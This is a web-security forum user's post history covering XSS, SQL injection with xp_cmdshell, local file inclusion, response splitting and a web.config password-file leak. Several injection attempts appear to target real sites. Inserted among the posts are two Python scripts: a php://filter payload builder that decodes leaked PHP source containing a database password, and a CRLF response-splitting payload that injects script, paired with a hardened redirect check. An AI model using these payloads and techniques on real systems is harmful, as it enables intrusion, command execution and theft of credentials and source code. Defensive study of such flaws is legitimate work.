Q and A on cross-site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For session fixation, hijacking, lockout, replay, session riding, etc.
Results 1 - 23 of 23
2 years ago
rickm
Hi Gareth Heyes, thanks for your answer, very much appreciated. However, I was unable to find an alternative for double_uri and malformed_uri in the new interface. Can you point it out to me, please? Also, do you have any kind of detailed documentation for the new interface? Or could you please consider videos illustrating the features? :) Thanks
Forum: Obfuscation
2 years ago
rickm
Hi all, I was reading about Hackvertor and I found this nice video (http://yehg.net/lab/pr0js/training/view/misc/joomla-1.5.20_encoded-xss/) where they used it to encode the XSS payload with nibbles; however, I was unable to find a similar feature in the current version (https://hackvertor.co.uk/public). Is it still possible? Can someone please point me to a video showing a similar technique wit
Forum: Obfuscation
2 years ago
rickm
Hi Albino, thanks for your answer, very much appreciated. I will take a closer look at the book you are referencing. This http://html5sec.org/ is nice. The other site (http://shazzer.co.uk/vectors) provides a lot of examples, but most of them do not look as exotic as the ones I referenced. If you know other sites with a list of exotic XSS, please let me know. Thanks.
Forum: XSS Info
2 years ago
rickm
Hi all, I'm dedicated to learning XSS. I understand the basics and I'm learning more every day, thanks to this great forum and all of you guys. Most of my tests are with Firefox 16.0.2 and this vulnerable test site (it's a site created intentionally to be vulnerable, for testing web issues): http://demo.testfire.net/search.aspx?txtSearch=<script>alert(1)</script> However, if y
Forum: XSS Info
2 years ago
rickm
Hi, I'm studying XSS and I'm learning a lot here; you are very good at it. I noticed that many XSS payloads depend on specific browsers; however, I tested some of the payloads that you provided for generic browsers and they do not work here. I'm using Firefox and I tested them against the IBM WatchFire site that is constructed to be vulnerable. For example, this basic XSS input works as e
Forum: Obfuscation
2 years ago
rickm
Hi Vaibs, thanks for sharing. I'm learning XSS and I loved your website; however, I was unable to reproduce many of your payloads to bypass the WAF. I'm using Firefox and I tested them against the IBM WatchFire site that is constructed to be vulnerable. For example, this basic XSS input works as expected: http://demo.testfire.net/search.aspx?txtSearch=<script>alert(1)</script> However all
Forum: Obfuscation
4 years ago
rickm
Thanks for the explanation, SeriousBeige.
Forum: SQL and Code Injection
4 years ago
rickm
The length and the == at the end look like base64, but the output is weird.
Forum: SQL and Code Injection
4 years ago
rickm
But PHP files are plain text, so why do you need to encode them to base64? Hmm... have you tried the /proc/self/ technique? http://www.0x50sec.org/how-to-exploit-local-file-inclusion-vulnerability/ Let me know if it works.
Forum: SQL and Code Injection
4 years ago
rickm
Since I can generate delays by calling xp_cmdshell with ping, is there a way to use it for timing? For example, do a SELECT and, if the comparison of the first char of the username is like 's', execute xp_cmdshell, otherwise don't execute it? Any ideas?
Forum: SQL and Code Injection
4 years ago
rickm
Hmm... but in general, what is the benefit of using php://filter/resource=/etc/passwd%00 instead of just =/etc/passwd%00? Does the host have a local SMTP server? If yes, you can deliver an SMTP message with PHP code in the body and load the mailbox of the apache / www-data user directly.
Forum: SQL and Code Injection
4 years ago
rickm
And you found a way to avoid the ":"? Well, if you can load local files directly, why do you need php://filter/resource=?
Forum: SQL and Code Injection
4 years ago
rickm
The weirdest thing is that if I inject a batched query: script.aspx?id=124&iid=1'; exec master..xp_cmdshell "ping 10.1.1.3" -- I see the page taking about 7 seconds to answer me, while the other queries are very fast. So I believe it's happening because it's executing ping against a host that doesn't exist and consequently it's generating a timeout. However, every try that I
Forum: SQL and Code Injection
4 years ago
rickm
Maybe it's the version of PHP? Maybe it doesn't work on newer versions like PHP 5.X? Just out of curiosity, why do you need it to read passwd? I don't understand, since passwd is plain text, and also using this PHP filter is useless for bypassing IDS. Also, I don't think this %00 works with the latest versions of PHP... I may be wrong.
Forum: SQL and Code Injection
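Several of the posts above ask why anyone would wrap a local-file-inclusion target in php://filter and base64. The point of the convert.base64-encode filter is that include() executes a .php file and returns only its output, whereas the filter returns the file's source as base64 text without executing it, which is what you want for config files holding credentials. The script below is an added example, not from the posts: the parameter shape and the sample PHP file are constructed, and the recovery function deals with the blob being embedded in the HTML of the page that echoes it.

```python
"""php://filter read-back for a file-inclusion parameter: payload construction
and recovery of the base64 blob from the page that echoes it.
Added example; parameter and file names are assumptions, SAMPLE_PHP is constructed."""
import base64
import re


def lfi_payloads(path):
    """Three forms for the same target file, for an include($_GET['page'])-style sink
    (assumed). 'direct' executes a .php file and returns only its output;
    'filter_plain' behaves the same; 'filter_b64' passes the file through the
    convert.base64-encode stream filter, so its raw source is returned as text."""
    return {
        "direct": path,
        "filter_plain": f"php://filter/resource={path}",
        "filter_b64": f"php://filter/convert.base64-encode/resource={path}",
    }


# A base64 run long enough not to be a stray word, optionally with padding.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def recover_source(body):
    """Pick the longest base64-looking run out of the HTML that echoed it, repair
    missing padding (often lost when the page trims the value), and decode.
    Returns None if nothing decodes cleanly."""
    runs = B64_RUN.findall(body)
    if not runs:
        return None
    blob = max(runs, key=len)
    blob += "=" * (-len(blob) % 4)
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return None


# Constructed sample of what the filter would hand back for a config include.
SAMPLE_PHP = "<?php\n$db_pass = 'constructed-secret';\ninclude('header.php');\n?>"


def wrap_in_page(source):
    """Constructed stand-in for the vulnerable page: echoes the base64 blob inside HTML."""
    blob = base64.b64encode(source.encode()).decode()
    return f"<html><body><div class=content>{blob}</div></body></html>"


if __name__ == "__main__":
    print(lfi_payloads("config.php")["filter_b64"])
    print(recover_source(wrap_in_page(SAMPLE_PHP)))
```

If the decoded text is still garbage, the usual causes are a second filter in the chain (for example string.rot13) or the page truncating the value; check the blob length against what a full file would need before blaming the encoding.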
4 years ago
rickm
flics, I tried and no luck. :( No one?
Forum: SQL and Code Injection
4 years ago
rickm
Thanks for the answer, lightos. Any idea how to exploit iid in a reliable way?
Forum: SQL and Code Injection
4 years ago
rickm
Yo Injectors, I'm testing a site and the URL is like this: script.aspx?id=124&iid=1 It's vulnerable to SQL injection in both parameters. If I inject: script.aspx?id=124&iid="1 I get: - Unclosed quotation mark after the character string '1, @fl_id=124'. Incorrect syntax near '1, @fl_id=124'. If I inject: script.aspx?id=124&iid='1 I get: - Incorrect sy
Forum: SQL and Code Injection
4 years ago
rickm
Hello, there is an application developed in ASP/.NET that was vulnerable to HTTP splitting attacks. There was an input parameter sent in GET requests that was used as part of the Location header on the redirect. So we just inserted a CRLF and we could create fake headers. They mitigated the problem, but I'm unsure if it's really a good mitigation. Now, it only prints on the Location header unti
Forum: CSRF and Session Info
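The redirect bug described above is a response-splitting primitive: one CRLF pair ends the Location header, a second blank line ends the 302 entirely, and whatever follows is read by the client (or an intermediate cache) as a second, attacker-authored response. The script below is an added example, not code from the post or the application it discusses: it reproduces the unchecked concatenation, parses the result the way a client would so the forged response is visible, and puts a hardened check beside it that rejects the request instead of trimming the value. The application, paths and parameter name are assumptions.

```python
"""Location-header injection through a redirect parameter: the bug beside a hardened
redirect. Added example; the application, paths and parameter are assumptions."""
import re
import urllib.parse

CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def emit_redirect(next_param):
    """Raw response head the server sends for a redirect to next_param."""
    return ("HTTP/1.1 302 Found\r\n"
            f"Location: {next_param}\r\n"
            "Content-Length: 0\r\n"
            "\r\n")


def vulnerable_redirect(next_param):
    """The original bug: the GET parameter is written into Location unchanged."""
    return emit_redirect(next_param)


def parse_response(raw):
    """Client's view: headers up to the first blank line, everything after is body."""
    head, _, body = raw.partition("\r\n\r\n")
    headers = []
    for line in head.split("\r\n")[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return headers, body


# Constructed attacker value: ends the 302 early and supplies a second, fully
# attacker-controlled response for the client or a shared cache to consume.
SPLIT_PAYLOAD = ("/home\r\n"
                 "Content-Length: 0\r\n"
                 "\r\n"
                 "HTTP/1.1 200 OK\r\n"
                 "Content-Type: text/html\r\n"
                 "Content-Length: 25\r\n"
                 "\r\n"
                 "<script>alert(1)</script>")


def redirect_target_is_safe(next_param):
    """Reject rather than strip: any control character in the value, or in the value
    after one more percent-decode (a later layer may decode again), fails the check,
    and only a site-relative path is accepted so the redirect cannot leave the host."""
    for candidate in (next_param, urllib.parse.unquote(next_param)):
        if CONTROL_CHARS.search(candidate):
            return False
    return next_param.startswith("/") and not next_param.startswith("//")


def hardened_redirect(next_param):
    """Validated version: a bad value gets a 400, never a partially cleaned header."""
    if not redirect_target_is_safe(next_param):
        return "HTTP/1.1 400 Bad Request\r\nContent-Length: 0\r\n\r\n"
    return emit_redirect(next_param)


if __name__ == "__main__":
    headers, body = parse_response(vulnerable_redirect(SPLIT_PAYLOAD))
    print(headers)
    print(body.splitlines()[0])   # the forged second response
    print(hardened_redirect(SPLIT_PAYLOAD).splitlines()[0])
```

Two design points worth keeping: the check runs on the value both as received and after one extra percent-decode, because a value that is clean in one representation can turn into CRLF in the next layer; and the relative-path rule closes the separate open-redirect problem that the same parameter usually carries.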
4 years ago
rickm
Hello, sorry if I posted in the wrong section, but I couldn't find the appropriate one. I'm doing a test and I obtained a copy of the web.config file. The interesting thing is that there is a line like this: "<add key="PasswordFile" value="C:\Inetpub\site\Users.acl" />". This called my attention to its being in the inetpub folder, and I was able to download it. It's wit
Forum: SQL and Code Injection
5 years ago
rickm
Thanks for the answers.
Forum: SQL and Code Injection
5 years ago
rickm
Yo lightos, thanks for your help. I think this SQL injection is really strange. See... Injecting: lang.asp?=1' order by 1-- Results in: Unclosed quotation mark after the character string ' order by 1--'. It makes me think that there is a problem with quotes or double quotes... If I inject: lang.asp?=1%20 order %20 by %20 1-- Results in: Microsoft OLE DB Provider fo
Forum: SQL and Code Injection
5 years ago
rickm
Yo lightos, looks like a good suggestion; however, I did it and couldn't solve the problem. Can you please translate for me what they mean by "operator must have an equal number of expressions in their target lists"? At first I was thinking it could be a different number of columns, but I tried... UNION%20 ALL%20 SELECT%20 CONVERT(nvarchar,@@version),NULL %20-- UNION%20 ALL%20 S
Forum: SQL and Code Injection
5 years ago
rickm
Yo dudes! I'm trying to exploit a SQL injection in a field in ASP with SQL Server - error-based SQL injection. Some information that may be helpful... UNION%20 ALL%20 SELECT%20 CAST(@@version %20AS %20int) %20-- Microsoft OLE DB Provider for SQL Server error '80040e07' Conversion failed when converting the nvarchar value 'CVP' to data type int. /include/lang.asp, line 19
Forum: SQL and Code Injection